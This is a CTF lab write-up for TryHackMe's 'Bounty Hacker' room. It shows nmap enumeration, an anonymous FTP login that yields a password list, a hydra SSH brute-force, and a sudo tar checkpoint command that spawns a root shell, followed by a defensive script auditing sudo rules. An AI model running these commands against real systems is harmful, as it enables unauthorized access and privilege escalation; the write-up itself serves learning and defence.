# Bounty Hacker

## [Bounty Hacker](https://www.tryhackme.com/room/cowboyhacker)

## Enumeration

> nmap -sCV -O -v

```
PORT      STATE  SERVICE         VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp             vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.4.11.0
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp    open   http            Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

```

## Exploit / User

port 21:

> ftp 10.10.225.190

trying to log in with anonymous credentials (the nmap ftp-anon script already reported that anonymous login is allowed):

> user : anonymous password :

it works

![](https://user-images.githubusercontent.com/53917092/99078566-5a4cae00-259d-11eb-9ec9-84bbd5ddb14b.png)

so we download the files locks.txt and task.txt

![](https://user-images.githubusercontent.com/53917092/99078658-85370200-259d-11eb-83a5-1968bfe1ef81.png)

![](https://user-images.githubusercontent.com/53917092/99078717-997aff00-259d-11eb-97cf-92437bf3b326.png)

locks:

```
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
```

(this looks like a password list file)

task:

```
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin
```

(now we know the system has a user named "lin")

using hydra to brute-force ssh with user "lin" and the passwords from locks.txt

> hydra -l lin -P locks.txt ssh://10.10.225.190 -F

and we got the password

using these credentials we can log in over ssh

once logged in, we can read user.txt

## Root

> sudo -l

```
User lin may run the following commands on bountyhacker:
    (root) /bin/tar
```

checking GTFOBins:

![image](https://user-images.githubusercontent.com/53917092/99079348-97fe0680-259e-11eb-8d8e-ef1d4a8ddadf.png)

we got the command:

> sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

and we are root :)
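The `sudo -l` result above is the whole escalation path: tar can execute a command through its checkpoint action, so a sudo rule for it amounts to a root shell. As an added example (not part of the original write-up), this shell function audits `sudo -l` output for such rules; the `ESCAPABLE` list is a small sample chosen for illustration, and the second rule in the sample input is constructed.

```shell
#!/bin/sh
# Added example: flag sudo rules whose binary can run arbitrary commands.
# ESCAPABLE is an illustrative sample, not a complete inventory.
ESCAPABLE="tar find vim vi less more awk nmap perl python python3 env bash sh"

# Reads `sudo -l` output on stdin, prints one finding per risky rule.
audit_sudo_l() {
    awk -v list="$ESCAPABLE" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) risky[a[i]] = 1 }
        # Rule lines start with a run-as spec, e.g. "(root) /bin/tar"
        /^[ \t]*\(/ {
            line = $0; sub(/^[ \t]+/, "", line)
            runas = line; sub(/\).*/, ")", runas)
            cmds = line;  sub(/^\([^)]*\)[ \t]*/, "", cmds)
            m = split(cmds, c, ",")
            for (j = 1; j <= m; j++) {
                sub(/^[ \t]+/, "", c[j])
                # Drop leading tags such as NOPASSWD: or SETENV:
                while (c[j] ~ /^[A-Z_]+:/) sub(/^[A-Z_]+:[ \t]*/, "", c[j])
                split(c[j], w, " "); path = w[1]   # first word is the binary
                if (path == "ALL") { print "CRITICAL " runas " ALL"; continue }
                k = split(path, p, "/")
                if (p[k] in risky) print "RISKY " runas " " path
            }
        }'
}

# Sample input: first rule is from the write-up, second is constructed.
sample_sudo_l() {
    cat <<'EOF'
User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOPASSWD: /sbin/reboot, /usr/bin/find
EOF
}

sample_sudo_l | audit_sudo_l
```

On a real host, pipe `sudo -l -U <user>` into `audit_sudo_l` for each account. A flagged rule is best replaced by a root-owned wrapper script with fixed arguments, or removed.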


